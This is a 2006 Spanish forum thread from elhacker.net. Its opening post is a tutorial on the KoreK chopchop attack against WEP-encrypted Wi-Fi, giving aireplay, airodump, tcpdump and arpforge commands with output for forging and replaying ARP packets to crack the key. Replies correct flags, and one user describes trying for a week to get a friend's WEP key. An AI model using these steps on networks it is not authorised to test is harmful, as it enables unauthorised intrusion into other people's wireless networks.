elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
12 Octubre 2008, 03:13  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless (Moderadores: rh3nt0n, longits, pianista, *dudux, ChimoC)
| | |-+  Ataque ChopChop de KoreK. Por o2T7f6j2
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 5 6 7 Ir Abajo Imprimir
Autor Tema: Ataque ChopChop de KoreK. Por o2T7f6j2  (Leído 20010 veces)
o2T7f6j2
echo -e "Nos vemos en \n$(pwd)"

Desconectado Desconectado

Mensajes: 2.783


./configure --enable-levitation --enable-diamagnet


Ver Perfil
Ataque ChopChop de KoreK. Por o2T7f6j2
« en: 28 Febrero 2006, 05:48 »

ATAQUE CHOPCHOP DE KoreK. Ataque mediante predicción de CRC. Por o2T7f6j2





Esto es sólo una extensión de la documentación del aircrack ;) , sólo un ejemplo para demostrar que el ataque de KoreK es ciertamente muy efectivo con algunos Puntos de Acceso o redes inalámbricas en las que se cumplen algunas condiciones especiales.

Muchas veces podemos ver cómo capturando el tráfico de un punto de acceso con nuestra tarjeta en modo Monitor vemos que éste suelta un paquete encriptado de vez en cuando.

Normalmente se trata de lo que llamamos paquetes ARP, que siendo reinyectados mediante el ataque -3 de aireplay generarán una cantidad de respuestas suficiente y a una velocidad considerable. Pero ¿Por qué aireplay no reconoce estos paquetes como peticiones ARP que se pueden reinyectar? Pues sencillamente porque no lo son. Hay veces que en otros protocolos se difunden periódicamente paquetes y no tienen por qué ser necesariamente ARP.

Aquí es donde entra el ataque mediante predicción de CRC. Y donde toma sentido la línea de la documentación del aircrack "Redifusión de cualesquiera datos" (no sólo paquetes ARP).

En la documentación viene explicado muy claro, por eso digo que esto no es más que un ejemplo de uso.



Bueno, comencemos ;D

Todas las MAC son inventadas, además de IMPOSIBLES. Incluídas las de las capturas, que están retocadas con GIMP.

Iniciamos la captura con airodump (por ejemplo)
Código:
airodump ra0 captura_chophop.cap

Ya tenemos la captura realizada con airodump. Donde nos aparecen 3 paquetes capturados catalogados como #data



Nos asociamos
Código:
aireplay -1 30 -e "ESSID\ INVENTADO\ \:\P" -a 00:03:09:GG:GG:GG -h 55:44:33:22:11:00 ra0

E intentamos reinyectar "nuestros ARP"
Código:
aireplay -3 -b 00:03:09:GG:GG:GG -h 55:44:33:22:11:00 -r captura_chophop.cap ra0
Pero efectivamente vemos que al tratar de reinyectar nuestras supuestas peticiones ARP con el ataque -3 aireplay nos dice que no, que no hay nada que reinyectar. Nunca suben los ARP requests a pesar de que sabemos que tenemos 3 preciados IVs en nuestra captura, la que hemos indicado a aireplay mediante la opción -r (captura_chophop.cap)

Código:
open(/dev/rtc) failed: No such file or directory
Saving ARP requests in replay_arp-0228-045015.cap
You must also start airodump to capture replies.
Read 19578322 packets (got 0 ARP requests), sent 0 packets...

Entonces probamos el ataque -4, como dice la documentación desencriptando primero un paquete (vemos que aquí ponemos com cliente la dirección MAC del AP, y es que es así como nos aparece en nuestras capturas, luego veremos por qué ocurre esto)
Código:
aireplay -4 -h 00:03:09:GG:GG:GG ra0

Y comienza a hacer su trabajo.



Una vez tenemos el resultado



Usamos tcpdump para ver la IP que nos interesa

Código:
tcpdump -s 0 -n -e -r  replay_dec-0220-142036.cap

Que nos devuelve algo como esto

Código:
reading from file replay_dec-0220-142036.cap, link-type IEEE802_11 (802.11)
14:20:36.205095 DA:ff:ff:ff:ff:ff:ff BSSID:00:03:09:GG:GG:GG SA:00:03:09:GG:GG:GG LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03, IP 192.168.1.1.520 > 192.168.1.255.520: RIPv2, Response, length: 64

Aquí ya vemos por primera vez de qué tipo de paquetes se trababa :) Exactamente lo vemos en "RIPv2, Response" (que no "ARP, Request" ;) )

Con esta información ahora sí que es posible forjar nuestra petición ARP

Código:
./arpforge replay_dec-0220-142036.xor 1 00:03:09:GG:GG:GG 00:03:09:GG:GG:GG 192.168.1.100 192.168.1.1.520 nuestra_nueva_peticion_ARP.cap

Como veis me invento la 192.168.1.100 (dejo la misma que en el ejemplo del doc en realidad), pero la dirección de destino debe corresponder a la obtenida con tcpdump (en este caso 192.168.1.520)

Y listo! Ya podemos ponernos a reinyectar nuestra nueva y reluciente petición ARP ;)

Código:
aireplay -2 -r nuestra_nueva_peticion_ARP.cap ra0

NOTA IMPORTANTE : Puede haber algún fallo . No dudéis a la hora de avisar;)

No hace falta tener un servicio como el enrrutamiento dinámico con RIPv2, esto se puede probar con "cualesquiera datos"  :D

El resultado:


y espero que os sirva.



.
« Última modificación: 06 Abril 2006, 22:21 por o2T7f6j2 » En línea


No debemos perder la fe en la humanidad que es como el océano: no se ensucia porque algunas de sus gotas estén sucias.Mahatma Gandhi (2 de Octubre del 1869 - 30 de Enero del 1948)
canido

Desconectado Desconectado

Mensajes: 2.197



Ver Perfil
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #1 en: 28 Febrero 2006, 09:48 »

Muy bueno el manual. FELICIDADES.

Te comento alguna cosilla: Aquí:

Citar
aireplay -3 -b "ESSID\ INVENTADO\ \:\P" -h 55:44:33:22:11:00 -r captura.cap ra0

¿No falta el -b...?

Aquí:

Citar
aireplay -4 -h 00:03:09:GG:GG:GG ra0

¿No falta el -r captura.cap?.


Y ¿esto no sobra?:

Citar
NOTA IMPORTANTE : Puede haber algún fallo EVIDENTE. Nada que alguien que se maneje más o menos decentemente con estas herramientas no sepa subsanar

 ;D ;D ;D . Saludos....
En línea

Mi LINUX en HD: Knoppix español

Lives-CD:  Troppix   Backtrack  Whax   Hax-Puppy
o2T7f6j2
echo -e "Nos vemos en \n$(pwd)"

Desconectado Desconectado

Mensajes: 2.783


./configure --enable-levitation --enable-diamagnet


Ver Perfil
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #2 en: 28 Febrero 2006, 12:14 »

Muy bueno el manual. FELICIDADES.

Gracias canido. No es nada.

¿No falta el -b...?


¿A la opción -b te refieres? Está puesta. Joder qué cortito soy, no sé qué me quieres decir  :-[

¿No falta el -r captura.cap?.

No, lo toma directamente desde la tarjeta en modo Monitor. Se supone que una tarjeta no puede estar comunicando en modo infraestructura con dos redes inalámbricas a la vez. Pero si alguien falsea la MAC y ésta se repite para dos redes supongo que sí puede confundirse aireplay.

Citar
Y ¿esto no sobra?:

Citar
NOTA IMPORTANTE : Puede haber algún fallo EVIDENTE. Nada que alguien que se maneje más o menos decentemente con estas herramientas no sepa subsanar

NOTA IMPORTANTE : Puede haber algún fallo. No dudéis a la hora de avisar.

¿Así?

Salu2
« Última modificación: 28 Febrero 2006, 12:16 por o2T7f6j2 » En línea


No debemos perder la fe en la humanidad que es como el océano: no se ensucia porque algunas de sus gotas estén sucias.Mahatma Gandhi (2 de Octubre del 1869 - 30 de Enero del 1948)
canido

Desconectado Desconectado

Mensajes: 2.197



Ver Perfil
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #3 en: 28 Febrero 2006, 12:57 »

Lo del -b:

Citar
aireplay -3 -b "ESSID\ INVENTADO\ \:\P" -h 55:44:33:22:11:00 -r captura.cap ra0

¿No debe ser?:

Código:
aireplay -3 -b 00:03:09:GG:GG:GG -h 55:44:33:22:11:00 -r captura.cap ra0

Bueno una tontería. Felicidades de nuevo  ;) .

Saludos...
En línea

Mi LINUX en HD: Knoppix español

Lives-CD:  Troppix   Backtrack  Whax   Hax-Puppy
o2T7f6j2
echo -e "Nos vemos en \n$(pwd)"

Desconectado Desconectado

Mensajes: 2.783


./configure --enable-levitation --enable-diamagnet


Ver Perfil
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #4 en: 28 Febrero 2006, 13:31 »

Ay, cuoño! creía que me decías la b. Hay que dormir más  ;D Además es bueno para las arrugas.
Gracias.
En línea


No debemos perder la fe en la humanidad que es como el océano: no se ensucia porque algunas de sus gotas estén sucias.Mahatma Gandhi (2 de Octubre del 1869 - 30 de Enero del 1948)
NetFree222

Desconectado Desconectado

Mensajes: 536



Ver Perfil
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #5 en: 28 Febrero 2006, 16:56 »

Es interesante esto de los atakes chop-chop,aunke con el atake 2 del aireplay no te lo hace directamente??vamos que elige el pakete y lo reinyecta??
Un saludo
En línea

Hay un lugar en el que todo el mundo es feliz,en el que las guerras se luchan bailando,bailando LA DANZA MAS FELIZ
orujillo

Desconectado Desconectado

Mensajes: 74


Ver Perfil
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #6 en: 01 Marzo 2006, 10:11 »

Hola a todos y un saludo,este es mi primer mensaje en el foro,he hecho el ataque de chophop y todo fue segun el manual hasta que hize este paso:

./arpforge replay_dec-0220-142036.xor 1 00:03:09:GG:GG:GG 00:03:09:GG:GG:GG 192.168.1.100 192.168.1.1.520 nuestra_nueva_peticion_ARP.cap

aqui hay dos cosas que no entiendo cuando pones el BSSID se debe repetir dos veces o no,y otra donde pones nuestra_nueva_peticion_ARP.cap que es lo que debo de poner,es algun fichero que tenga yo ya guardado o es un que crea el,cuando le envio este comando me dice fichero no encontrado,os digo que llevo una semana intentando sacar la wep de un colega pero como casi nunca esta conectado no le puedo injectar puesto que no tengo station,cuando se conecta si me sale station y le injecto pero no me pilla arp,otra duda es que mi conesion no hay manera de me pille ni un data ni se asocie,tengo desactivado el dhc,y filtradas las mac,no se si sera por eso,espero vuestra ayuda,gracias y un saludo.

En línea
o2T7f6j2
echo -e "Nos vemos en \n$(pwd)"

Desconectado Desconectado

Mensajes: 2.783


./configure --enable-levitation --enable-diamagnet


Ver Perfil
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #7 en: 01 Marzo 2006, 16:48 »

Debes pillar data, aunque no sean ARP,

El archivo es el que crea. Cuando te dice no encontrado se refiere al archivo.xor. Debes asegurarte de que se llama como el que has obtenido con el -4.

Salu2
En línea


No debemos perder la fe en la humanidad que es como el océano: no se ensucia porque algunas de sus gotas estén sucias.Mahatma Gandhi (2 de Octubre del 1869 - 30 de Enero del 1948)
CaptainKitty

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #8 en: 02 Marzo 2006, 11:34 »

Buenas-

En vez de volver a capturar IVs con el:

Código:
aireplay -4 -h 00:03:09:GG:GG:GG ra0

¿No podrías utilizar los 3 IVs que ya tienes en captura_chophop.cap para hacer directemente:

Código:
aireplay -4 -r captura_chophop.cap

A lo mejor me estoy confundiendo, pero a mí me parece que si ya tienes IVs no hace falta olfatear otra vez, ya que a veces estos paquetes no son nada fáciles de encontrar (si no hay nadie conectado por ejemplo).

Saludos
En línea
Uxio
Hacking Wireless

Desconectado Desconectado

Mensajes: 3.383


Volveré...


Ver Perfil WWW
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #9 en: 02 Marzo 2006, 15:46 »

Muy buena o2.  :D :D :D :D
En línea

o2T7f6j2
echo -e "Nos vemos en \n$(pwd)"

Desconectado Desconectado

Mensajes: 2.783


./configure --enable-levitation --enable-diamagnet


Ver Perfil
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #10 en: 03 Marzo 2006, 00:37 »

Muy buena o2.  :D :D :D :D

Gracias Uxio.  :) Me alegra verte por aquí de nuevo.

Es interesante esto de los atakes chop-chop,aunke con el atake 2 del aireplay no te lo hace directamente??vamos que elige el pakete y lo reinyecta??

Buenas-

En vez de volver a capturar IVs con el:

Código:
aireplay -4 -h 00:03:09:GG:GG:GG ra0

hacer directemente:

aireplay -4 -r captura_chophop.cap

No tengo posibilidad de comprobarlo. Sé que así funciona, tened en cuenta que yo no sabía qué tipo de paquetes eran y decidí probar así. No había clientes conectados (es el router con dirección 192.168.1.1 quien envía estos paquetes a 192.168.1.255).

Salu2
En línea


No debemos perder la fe en la humanidad que es como el océano: no se ensucia porque algunas de sus gotas estén sucias.Mahatma Gandhi (2 de Octubre del 1869 - 30 de Enero del 1948)
NetFree222

Desconectado Desconectado

Mensajes: 536



Ver Perfil
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #11 en: 04 Marzo 2006, 13:46 »

De todas formas tambien se pueden generar paketes arp para el atake 3 conectando desde una clave falsa con otro ordenador(no esta comprobado que sake la wep,simplemente digo que los genera)si alguien saca alguna wep asi que me lo comente porke seria un avanze.
Un saludo
En línea

Hay un lugar en el que todo el mundo es feliz,en el que las guerras se luchan bailando,bailando LA DANZA MAS FELIZ
t321

Desconectado Desconectado

Mensajes: 1.158



Ver Perfil WWW
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #12 en: 04 Marzo 2006, 15:14 »

Citar
De todas formas tambien se pueden generar paketes arp para el atake 3 conectando desde una clave falsa con otro ordenador(no esta comprobado que sake la wep,simplemente digo que los genera)

Pero a mi me parece que los arp que genera tiene la clave que te acabas de inventar. Eso me pasó a mi una vez que me asocié con una clave falsa y reinyecté sobre ese  cliente y después el pass que descubrí pues era el que yo habia puesto.

Nos vemos.
En línea

www.seguridadwireless.net/foro <-- foro ;D


"Nunca discutas con un imbecil, te rebajaras a su altura y te machacara con su experiencia." by un people


Uxio
Hacking Wireless

Desconectado Desconectado

Mensajes: 3.383


Volveré...


Ver Perfil WWW
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #13 en: 04 Marzo 2006, 15:16 »

Ahí le has dado t321, la clave que sacas es mala. A mí lo único que se me ocurre que podemos hacer es conectar ese ordenador con la clave falsa para que al hacer el ataque 1 conteste rápido con un ARP.
En línea

NetFree222

Desconectado Desconectado

Mensajes: 536



Ver Perfil
Re: ATAQUE CHOPCHOP DE KoreK. Por o2T7f6j2
« Respuesta #14 en: 04 Marzo 2006, 15:27 »

Pero los arp tienen datos d la clave??donde va la clave es en los Ivs no??los arp simplemente son peticiones de conexion o stoy ekivocado...no se...
Un saludo
En línea

Hay un lugar en el que todo el mundo es feliz,en el que las guerras se luchan bailando,bailando LA DANZA MAS FELIZ
Páginas: [1] 2 3 4 5 6 7 Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC
Free counter and web stats